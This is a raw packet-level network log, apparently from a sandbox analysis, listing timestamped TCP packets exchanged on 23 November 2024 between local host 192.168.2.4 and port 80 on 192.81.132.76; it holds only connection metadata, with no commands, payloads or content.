                                                                                                                                                          Nov 23, 2024 12:47:16.377856970 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.377983093 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.378035069 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.381573915 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.381649971 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.381712914 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.385072947 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.385162115 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.385219097 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.388641119 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.388750076 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.388813019 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.392247915 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.392349005 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.392406940 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.395848036 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.395948887 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.396019936 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.399415016 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.400188923 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.400248051 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.403101921 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.403167963 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.403228045 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.406625986 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.406748056 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.406814098 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.410175085 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.410307884 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.410372019 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.414134979 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.414263010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.414319992 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.417100906 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.417211056 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.417262077 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.420439005 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.420497894 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.420552969 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.423799992 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.424058914 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.424128056 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.426919937 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.461559057 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.461621046 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.461668015 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.463141918 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.463200092 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.463238001 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.466216087 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.466270924 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.466386080 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.469326019 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.469387054 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.469410896 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.472440958 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.472510099 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.472707987 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.475563049 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.475614071 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.475665092 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.478631020 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.478683949 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.478841066 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.481690884 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.481750965 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.481810093 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.484870911 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.484946012 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.485076904 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.487910032 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.487966061 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.488034964 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.491334915 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.491391897 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.491436958 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.499589920 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.499650002 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.499667883 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.500463963 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.500503063 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.500519037 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.502424002 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.502460003 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.502476931 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.505141973 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.505197048 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.505351067 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.507364988 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.507421970 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.507452965 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.509519100 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.509573936 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.509629011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.511976004 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.512033939 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.512064934 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.514902115 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.514936924 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.514954090 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.515538931 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.515578985 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.515620947 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.516499996 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.516554117 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.516607046 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.517838001 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.517903090 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.517925024 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.519170046 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.519222975 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.519268036 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.520520926 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.520580053 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.520610094 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.521842003 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.521907091 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.521938086 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.523225069 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.523261070 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.523277044 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.524523020 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.524642944 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.524650097 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.525861025 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.525917053 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.525968075 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.527206898 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.527256966 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.527343035 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.528589010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.528640032 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.528640985 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.529911041 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.529963017 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.530038118 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.531202078 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.531251907 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.531335115 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.532514095 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.532574892 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.532639027 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.533838034 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.533888102 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.533963919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.535146952 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.535197973 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.535274982 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.536468029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.536518097 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.536544085 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.537781000 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.537837982 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.537889957 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.539098024 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.539155960 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.539174080 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.540395021 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.540460110 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.540493011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.541707993 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.541781902 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.541830063 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.543006897 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.543060064 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.543095112 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.544287920 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.544358015 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.544368029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.545705080 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.545758963 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.545813084 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.546863079 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.546928883 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.546952009 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.548173904 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.548232079 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.548263073 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.549421072 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.549473047 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.549525023 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.550685883 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.550724030 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.550751925 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.551963091 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.552018881 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.552058935 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.553262949 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.553322077 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.553337097 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.554548979 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.554622889 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.554634094 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.555754900 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.555823088 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.674484968 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.674711943 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.674777031 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.675091982 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.675226927 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.675282001 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.676414967 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.676568985 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.676631927 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.677355051 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.677455902 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.677506924 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.678087950 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.678158045 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.678216934 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.678611040 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.678663015 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.678738117 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.679291010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.679446936 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.679497957 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.680174112 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.680227995 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.680278063 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.680677891 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.680809975 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.680859089 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.681404114 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.681457996 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.681524992 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.681845903 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.681900978 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.681953907 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.682634115 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.682769060 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.682817936 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.683626890 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.683828115 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.683895111 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.684649944 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.684777975 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.684832096 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.685667038 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.685739994 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.685798883 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.686660051 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.686763048 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.686819077 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.687642097 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.687766075 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.687823057 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.688633919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.688771009 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.688827991 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.689626932 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.689733028 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.689790964 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.690629005 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.690742970 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.690810919 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.691615105 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.691746950 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.691804886 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.692605972 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.692747116 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.692805052 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.693619967 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.693738937 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.693820000 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.694622993 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.694768906 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.694825888 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.695594072 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.695715904 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.695774078 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.696609974 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.696744919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.696803093 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.697653055 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.697813988 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.697890043 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.698649883 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.698818922 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.698901892 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.699599028 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.699712992 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.699768066 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.700614929 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.700731039 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.700787067 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.701632977 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.701706886 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.701760054 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.702666044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.702702999 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.702754974 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.703628063 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.703816891 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.703866005 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.704611063 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.704705000 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.704768896 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.705775023 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.705811977 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.705869913 CET4973480192.168.2.4192.81.132.76
